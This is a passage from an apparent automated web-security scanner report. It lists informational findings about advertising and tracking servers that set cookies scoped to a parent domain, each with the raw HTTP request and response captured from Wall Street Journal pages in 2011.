Last-Modified: Tue, 14 Jun 2011 00:13:54 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 14 Jun 2011 01:13:54 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 6038

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'G07608';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
11.22. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=1&betq=4544=381370 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; BASE=x7Q9Oi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0ibEOliUSEDbOxB!; ROLL=U6APCjO!; F1=BoSNk3kAAAAAnXzCAIAAgEA; C2=PAM7NFJwFsb0FCaqHLQCiZMSi+iAezihYtphC88BGe4sWJwYkaUbDqsAZPVxHOLiIcCqGAXrKLwJ3ZYbtKPCC0nBwxa8CwwcGbokCfASbXUqH0t1Fl6BLGeRpeAPaaUqHEb4Fl6BA9qRpeAZhXUqHskmGl6BBGeRpeA2kXUqHoLOGl6BYGeRpeAghXUqH0NYGl6B8LrRpeAUlZUqHgJaGl6BcbpRpeAhhXUqHUY4Fl6BEHoRpeQVrZUqHsN5Fl6BBHoRpegdeZUqHYZgGl6BC9qRpegCaaUqHEbmGl6BFBqRpeQziaUqHwbmGlKseKw7RaM3RGgAg2cBdHm5IaQa0KnAbzqxc3I9DsfzFETroNAPDa8xum/AHrpxHXAhTaIp2iLBqirxcPrZFMKpGS6sQVwSkaIplWsAT3jBo/KEHcHiGkG; GUID=MTMwNzM2MTI5NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:14:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Nfq9NFJwIob0FAXqHDQCiZ8Ki+CAezih7sphA88BGq2sWBwYkaEUDqMAZPVxqNLiGcCqGMVrKDwJ3ZIUtKvBC0nBTxa8AwwcGnmkCXASbXEjF0t1FxYBLGeRMWAPaaEjFEb4FxYBA9qRMWAZhXEjFskmGxYBBGeRMWA2kXEjFoLOGxYBYGeRMWAghXEjF0NYGxYB8LrRMWAUlZEjFgJaGxYBcbpRMWAhhXEjFUY4FxYBEHoRMWQVrZEjFsN5FxYBBHoRMWgdeZEjFYZgGxYBC9qRMWgCaaEjFEbmGxYBFBqRMWQziaEjFwbmGxIseCw7Ra8vRGAAg2cBA/l5IaAT0KHAbzqx/2I9BsfzFQRroFAPDasqumfAHrpxqOAhTa4h2irAqirx/OrZDMKpGe4sQNwSka4hlWMAT3jBL/KEFcHiGwE; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Thu, 13-Jun-2013 00:14:05 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 14 Jun 2011 01:14:05 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
11.23. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...
11.24. http://p.opt.fimserve.com/bht/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /bht/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bht/?r=p&px=363&v=1&rnd=58424677746370430 HTTP/1.1
Host: p.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJE3NYfulixdXdQajAg==; UI=2b0be1156db673a127|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; ssrtb=0; LO=00Mn6F5rm1O00Kf500g0QhoGO4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: LO=00MB6D8xm1O00Of500o0StcXwI; Domain=.opt.fimserve.com; Expires=Tue, 13-Sep-2011 00:13:57 GMT; Path=/
ETag: W/"43-1160088754000"
Last-Modified: Thu, 05 Oct 2006 22:52:34 GMT
Content-Type: image/gif
Content-Length: 43
Date: Tue, 14 Jun 2011 00:13:56 GMT

GIF89a.............!.......,...........L..;
11.25. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="; udm_0=MLv3NzMJZjpn3hc5wFS813Gq21JyKlW/a0G0nU4qYXQr8bdIXllY4qSUGIMEVAYaUgmC7BE5rePyXCMhVeRUU77T0dB9laIjEG35bFZpiOLnlDdGTCFCQ0MEWZAmxumVjM+JUKi+lr0ZvsuCzJ6ckWKgM2OtiqD9UBfi+1+FEbO8SDIdRmUE/QHYAgD0BRAO1vqZsK3phnIHHJc9evRe+Zfm+Tk9uXoXINe9b7K4da4fOMFUkAPmcPkL7oUaiZo+zB3Vj59wmDAcZ+i2pP4y+DrGqQJ4422c4ku2MADSnGtyPVKqSIE7YSF35LTPZC1VtpFy8XSScJqe95WonH1o68US3zi9TlUL1DNZvOs54PKugt2D7oYeeUu7cPgxIPzPqQwTDLydgTDcNm+ud0e7udev/5FrU83+5sQHzARSPJV7BjZXMBYHVdPbXLgcpffXV5dy1h2qu7Y5BpTLpTJJMmQ4SyB3qE8rx9AmmTztdIVlW8Poy8G+Jw7xdO0qUFnOCnhJsEBVmvGOzwiKUOu8BrV1+IuW4C84KLuX6i0WQ1ychZvQsd4jYItN2ZaEmmxiPO0VHSP5+SV4NdIO7GjdrX8Wjli9o9x2guE1IXcQeTWhagmrxIa06M/Z9l8dBAw4gq+6XA6+SY81NzRWcSUTLp8d+rVmr8Q6zk1rmt09KMagZqQCpbQ4k3s+o2od1gaGpWkloOFCGaZnSA8FSQWGAcJQnRZtvsutuSsjPWXdjlClDyc26akmSJWi4grlIoaln+T0KcrxT0vPTcsBzR850hurWA1Yh/I/iJkOxptQVO2kiTwRzLru9N9oUQcTstfIMixT81uc5LjQeaidpT8vosi50NFzFVe3np8GQ4ZVAtGu6yCbMOOOi7enK8M2jI/3fdLFdMdOvS+435aVR3rkIhaRwfqwpPfSE/mXu49uTvBZRThdPnBAOjIIneapPU7sFczKownb1tWafVIW8R+SWBn+voW5C3J5TpPU5G8xTLlF6FaV5tvfGFCI458ex/CF7jdGelRCRZ0e67MDdJ3LlY7UAL8ma79sqd5DVX5GFejXCKA8BWvclbbbz2o/GN8a8Ksbd+IantFxPMDktxOajsinEElt0gXuHjkddFCGHA+cuYgde334avcjMiASDvS3ZM4RlSx9AGNKeXia/234gPT82RqePnu/Ghyp7AVar05f+HZOAElWzhGVDPGVEabC8S/EAoH+AhbGAm3gVc0bPXMqB85SpC3V5UAdKvSEPlJYC7ocx6qjeR6fk/Wbocy3PdIL58T4enH5STFqqujhseNSRnr2A+9+VO4sBOmJrHkP3OSBI5SPfECBEljsr3rfMc1HPYx2zhL4Vv/gTUDeirzONRGZT1+7lfWIpyc+j895bCkM73Cpb0YCQQvdWkhv3iYz+3u8faBHBbkKadQA0zyPzHtH63Xd9V6rfMsX7p4xMLpHFchX0M4jKIgrUfwlyFLPQMYB3mvM3iVmFzcF9L2inBeyWU9lsZI7tC65pTsyPVhf1NtNZdkMxZfskrgwDSwSwgPuupX5TgeJ8P4iT+8kman5SI0blgwfdfOt8qllPzU8IfZ1jznx90RMcWoObdvHaDszOUZ7lEpW3QM3NFGmaww8XOLnsgThSCe7MwZB82c47TUqLuCKeqtb9LJTycXnybjNiLQZPdyglSFanHImIgvH/lblsrhDMnzK5UBRVpQoFyMq6iW6N9ChO+FiCV/rKjWGAgmX5i9nMlPi22HA5ag1AMV8meFAWwnyjGSy69Cp

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJSwsJaU2518p566AWsC6dZEzoBZUZ7/MkL+R5lxMhiImTOkH9IHZeBJGHWKCW+4z4aSyyY0W5c0FoFlDXAUEgoeqnG3CWmVSF2wSLPrctos08pBU7T68cAaaP1aGZKkcXEnwgMTVQO6ZD6qYFep2QHUaSPacKZ5IVUuso7sLseJ6TYO/jZr/QQOVXTyyiHHA0O5QdBg3xIZFXgXUzUKUdj3k35sCzhgEO9JHYYNeUhr+mku3ulPnuBbglt0tp0xWuqUAsCnad6JLNu1z3mf0+VyBqnZiFph9q75ufqeRpBlZ259HX6EB/K6hCQkR1vUIq2iWQqYre/UGpODxRVbTrzMX+Rj93Ba7MNvXe5DPC/zN2Vj6clms2hvRI9HwaE8a0STCQ66jLmn9sOJ6Tx2g1xjtVKesawwLZl7I3ukfVr+eAFEVEmT/hPDNfloeUWQG7L/JZmlZruzsznycetXdfTGfn6RO0189r89MsJO2SJK2RYb32aXhSrQpfuIVfPKveqv2u4tQ76cYek9qUeyoWb871h/RQ8t/NIEj8VqxjYca5nEcr54WQOI96BHDHkJJj0pT7DqyjLHhV0jOuw1lu0fj5QG8kXqdjLIvnlvC5/Qp1Nyb2u7kD8WVdSP+4nTgdHdTbYqmO5EicJDsZmdlu; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
